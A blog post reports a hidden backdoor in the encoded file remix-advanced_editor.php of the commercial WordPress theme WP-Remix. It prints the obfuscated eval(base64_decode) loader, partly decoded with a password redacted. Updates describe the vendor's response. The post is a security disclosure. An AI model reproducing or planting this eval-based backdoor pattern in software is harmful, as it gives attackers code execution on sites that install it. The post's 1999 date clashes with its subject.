[off] crayon

This summer, R.Bhavesh released his new version of the wordpress theme WP-Remix. A good friend of mine who wishes to be anonymous bought a developer license of this theme/script wordpress software. It seems to be a very nice way to turn your wordpress blog into a more of a CMS. My friend liked it so much he has been trying to get me into buying a license myself, using his “affiliation” link (gee, go figure :P). But I have been a little hesitant.

I asked my friend if I could have a copy to test it out on my local test-server. After receiving a copy, my anti virus scanner gave me a malicious malware warning. My friend told me this was just a “bug” and that it had been clarified on the WP-Remix support forums.

My NOD32 AV scanner reported the malware in the file remix-advanced_editor.php and only this file. The file is also encoded. This got me a little bit worried, and I decided to decode the file and check it myself. After a proper decode of the file and going through the code I found something disturbing. A hidden callback function that could be used as a backdoor.

Here is the encoded part which is at the bottom of the file:

[crayon]Pg==’;eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMj M0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0 YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’));?>[/crayon]

And here is what it decodes into (I have [removed] the password for security reasons):

[crayon]zö¥m«ë‡^r‡^$_X=base64_decode($_X);$_X=strtr($_X,’123456aouie’,’[removed]‘); $_R=ereg_replace(‘__FILE__’,"’".$_F."’",$_X);eval($_R);$_R=0;$_X=0;$[/crayon]

I had no trouble using this callback function as a backdoor into my local wordpress installation, and to verify it I got my friend’s permission to try his sites as well. All of them where easily penetrated. Either the creator of the theme made this to penetrate sites that illegally use his theme/script without a license or maybe someone has penetrated his distribution software. I have no clue what the reason could be.

I tried sending 2 emails to WP-Remix about this over the passed 2 weeks. But there has still been no reply. I tried to make a post on their support forum to show the discovery, but the thread got deleted twice. Then another user of the forum wanted to know why they deleted the thread, and his thread got deleted as well.
So it seems like they are trying their best to keep this under wrap. And due to this I have no choice but to write about the findings in my official blog instead.

To be continued

Update

WP-Remix support personnel seems to have taken the issue more seriously. R.Bhavesh mention that all my claims are falsified. I cant blame him, but the callback function is there for anyone to see. The encoded file is very easy to decode. And I suggest they use something more secure in the future. It’s not much money investing into a proper Zend or Ioncube encoders. It might benefit them in the long run. When the new file comes out, I will most likely get a copy of it from my friend and I will attempt to decode it again to check for changes. If they encode it properly, I might not be able to decode it. But time will tell.

After been reading up on various topics on the WP-Remix support forum, I do not think this was intentional by WP-Remix. Most like a bad security flaw which they are now trying to correct. Support personnel is answering questions on the forum on daily basis helping users, and they seem to be doing a good job.
If the next release of the file is a bit more secure, I might even end up getting myself a license, since I really like the idea of WP-Remix, and got quite fond of it by doing some internal testing on my local web-server.

2nd Update

Some have asked me to repost the part of the file with the code in issue, but I would like to honor R.Bhavesh request to not post it. The code is a security risk until WP-Remix have an update the encoded remix-advanced_editor.php.

If you want to follow the progress of WP-Remix efforts in fixing this, please head over to their support forum. You can find the ongoing discussion in the following thread.

3rd Update

Made a new update post about the new remix editor file here

Leave a comment | Trackback
Oct 22nd, 1999 | Posted in Uncategorized
Tags:
No comments yet.

Leave a comment

XHTML: Usable tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
RSS for comments on this post

Disclaimer: For any content that you post, you hereby grant to Deadhouse Gates the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.